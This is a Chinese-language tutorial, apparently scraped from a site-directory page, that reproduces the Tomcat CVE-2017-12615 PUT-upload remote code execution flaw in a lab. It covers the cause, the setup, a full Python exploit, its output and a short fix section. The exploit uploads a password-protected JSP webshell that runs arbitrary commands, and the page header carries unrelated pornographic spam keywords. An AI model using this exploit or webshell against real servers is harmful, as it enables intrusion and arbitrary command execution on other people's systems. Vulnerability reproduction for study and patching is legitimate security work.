日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的,通過配置文件可知,當后綴名為.jsp和.jspx的時候是通過JspServlet處理請求的,而其他的精通文件是通過DefaultServlet處理的可以得知:"1.jsp "(末尾有一個空格)并不能匹配到JspServlet,而是會交由DefaultServlet去處理當處理PUT請求時:會調用resources.bind:dirContext為FileDirContext:調用rebind創建文件又由于windows不允許" "(空格)作為文件名結尾,所以會創建一個".jsp"文件,導致代碼執行

漏洞環境

漏洞靶機 Win 2003x64 :192.168.136.136
PC主機(Python環境) :192.168.1.103
漏洞存在范圍:Tomcat-7.0.0-Tomcat-7.0.81
Tomcat-遠程代碼執行漏洞

 

環境搭建

win 2003x64 安裝 JAVA環境

Tomcat7.0.75下載:http://archive.Apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
Tomcat-遠程代碼執行漏洞

 


Tomcat-遠程代碼執行漏洞

 

開啟HTTP PUT

找到Tomcat的安裝目錄下的conf的web.xml

Tomcat-遠程代碼執行漏洞

 


Tomcat-遠程代碼執行漏洞

 

readonly            Is this context "read only", so HTTP
					commands like PUT and DELETE are
					 rejected?  [true]   

這個意思就是說:當前是只讀模式,是不允許修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

Tomcat-遠程代碼執行漏洞

 

添加如下代碼并保存:

<init-param>
	<param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>
Tomcat-遠程代碼執行漏洞

 

修改完之后,重啟Tomcat:

Tomcat-遠程代碼執行漏洞

 

漏洞復現

Python EXP:

#! -*- coding:utf-8 -*-
 
import httplib
 
import sys
 
import time
 
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.Append(temp
 
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>'''
 
try:
 
    conn = httplib.HTTPConnection(sys.argv[1])
 
    conn.request(method='OPTIONS', url='/ffffzz')
 
    headers = dict(conn.getresponse().getheaders())
 
    if 'allow' in headers and 
       headers['allow'].find('PUT') > 0 :
 
        conn.close()
 
        conn = httplib.HTTPConnection(sys.argv[1])
 
        url = "/" + str(int(time.time()))+'.jsp/'
 
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
 
        conn.request( method='PUT', url= url, body=body)
 
        res = conn.getresponse()
 
        if res.status  == 201 :
 
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
 
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
 
        elif res.status == 204 :
 
            print 'file exists'
 
        else:
 
            print 'error'
 
        conn.close()
 
    else:
 
        print 'Server not vulnerable'
 
except Exception,e:
 
    print 'Error:', e

運行Python-EXP腳本:

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080

得到的shell:http://192.168.136.136:8080/1574766773.jsp
Tomcat-遠程代碼執行漏洞

 

得到一枚Webshell:

Tomcat-遠程代碼執行漏洞

 

訪問:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
Tomcat-遠程代碼執行漏洞

 

漏洞修復

將Tomcat更新到該漏洞被修復的版本(例如:Tomcat:8.5.23)readonlyinit-param不應該將false首先設置。如果該參數保留到默認(true),則攻擊者無法上傳文件。最后可以在前端安裝WAF等防護軟件來阻止PUT和DELETE請求。

分享到:
標簽:漏洞 Tomcat
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定